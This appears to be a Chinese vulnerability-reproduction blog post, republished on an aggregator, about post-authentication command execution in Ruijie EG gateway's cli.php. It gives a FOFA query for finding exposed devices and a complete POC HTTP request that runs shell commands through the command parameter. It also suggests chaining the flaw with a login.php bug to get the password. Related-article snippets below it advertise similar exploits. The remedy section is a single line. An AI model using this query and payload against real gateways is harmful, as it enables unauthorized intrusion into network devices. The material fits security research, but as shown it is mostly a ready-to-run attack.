【漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞

这篇具有很好参考价值的文章主要介绍了【漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

Nx01 产品简介

        锐捷EG易网关是一款综合网关,由锐捷网络完全自主研发。它集成了先进的软硬件体系架构,配备了DPI深入分析引擎、行为分析/管理引擎,可以在保证网络出口高效转发的条件下,提供专业的流控功能、出色的URL过滤以及本地化的日志存储/审计服务。

Nx02 漏洞描述

        锐捷EG易网关cli.php存在后台命令执行漏洞,此漏洞需要权限,可搭配login.php命令执行漏洞获取登陆密码结合使用。

Nx03 产品主页

fofa-query: app="Ruijie-EG易网关" && body="/login.php?a=version"

【漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞,【漏洞复现】,web安全

【漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞,【漏洞复现】,web安全

Nx04 漏洞复现

POC:

POST /cli.php?a=shell HTTP/1.1
Host: {{Hostname}}
Connection: close
Content-Length: 28
Accept: */*
Content-Type: application/x-www-form-urlencoded
Cookie: RUIJIEID=;

notdelay=true&command=whoami

【漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞,【漏洞复现】,web安全

Nx05 修复建议

建议联系软件厂商进行处理。文章来源地址https://www.toymoban.com/news/detail-815249.html

到了这里,关于【漏洞复现】锐捷EG易网关cli.php后台命令执行漏洞的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 漏洞复现|Kyan密码泄露/命令执行漏洞

    所有发布的技术文章仅供参考,未经授权请勿利用文章中的技术内容对任何计算机系统进行入侵操作,否则对他人或单位而造成的直接或间接后果和损失,均由使用者本人负责。 Kyan网络监控设备存在账号密码泄露漏洞,该漏洞是由于开发人员将记录账户密码的文件放到网站

    2024年02月12日
    浏览(32)
  • Yapi命令执行漏洞复现

    YApi 是高效、易用、功能强大的 api 管理平台,旨在为开发、产品、测试人员提供更优雅的接口管理服务。可以帮助开发者轻松创建、发布、维护 API,YApi 还为用户提供了优秀的交互体验,开发人员只需利用平台提供的接口数据写入工具以及简单的点击操作就可以实现接口的管

    2024年02月12日
    浏览(35)
  • 禅道后台命令执行漏洞

    禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。 禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能

    2024年02月11日
    浏览(26)
  • 禅道后台命令执行漏洞二

    禅道是第一款国产的开源项目管理软件。它集产品管理、项目管理、质量管理、文档管理、 组织管理和事务管理于一体,是一款专业的研发项目管理软件,完整地覆盖了项目管理的核心流程。 禅道管理思想注重实效,功能完备丰富,操作简洁高效,界面美观大方,搜索功能

    2024年02月11日
    浏览(31)
  • nginxWebUI runCmd命令执行漏洞复现

    NginxWebUI 是一款图形化管理 nginx 配置的工具,可以使用网页来快速配置 nginx单机与集群的各项功能,包括 http协议转发,tcp协议转发,反向代理,负载均衡,静态 html服务器,ssl证书自动申请、续签、配置等,配置好后可一建生成 nginx.conf文件,同时可控制 nginx使用此文件进行

    2024年02月16日
    浏览(91)
  • 漏洞复现 - - -Struts2(s2-045)远程命令执行漏洞

    Struts2是一个基于MVC设计模式的Web应用框架,它本质上相当于一个servlet,在MVC设计模式中,Struts2作为控制器(Controller)来建立模型与视图的数据交互。Struts 2是Struts的下一代产品,是在 struts 1和WebWork的技术基础上进行了合并的全新的Struts 2框架。其全新的Struts 2的体系结构与St

    2024年01月20日
    浏览(36)
  • 漏洞复现-nginxWebUI runCmd前台远程命令执行漏洞(附漏洞检测脚本)

    文章中涉及的漏洞均已修复,敏感信息均已做打码处理,文章仅做经验分享用途,切勿当真,未授权的攻击属于非法行为!文章中敏感信息均已做多层打马处理。传播、利用本文章所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担

    2024年04月17日
    浏览(24)
  • 多个安全厂商安全设备 远程命令执行漏洞复现

    此文章仅用于技术交流,严禁用于对外发起恶意攻击!!! 该漏洞可执行远程代码 FOFA:body=“/webui/images/default/default/alert_close.jpg”

    2024年02月03日
    浏览(30)
  • Cacti命令执行漏洞复现(CVE-2022-46169)

    Cacti项目是一个开源平台,可为用户提供强大且可扩展的操作监控和故障管理框架。在1.2.22版本中存在一处命令注入漏洞,攻击者可以通过X-Forwarded-For请求头绕过服务端校验并在其中执行任意命令。漏洞编号:CVE-2022-46169,漏洞等级:严重。 影响版本 Cacti == 1.2.22 不受影响版本

    2024年02月02日
    浏览(72)
  • CVE-2021-22205 GitLab 远程命令执行漏洞复现

    目录 一、漏洞信息 二、环境搭建 三、复现过程 1.测试漏洞 2.漏洞利用,反弹shell 四、修复建议 一、漏洞信息 漏洞名称 GITLAB 远程命令执行漏洞 漏洞编号 CVE-2021-22205 危害等级 高危 CVSS评分 6.5 漏洞厂商 Ruby 受影响版本 11.9 = Gitlab CE/EE 13.8.8;13.9 = Gitlab CE/EE 13.9.6;13.10 = Gitlab

    2024年02月05日
    浏览(31)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包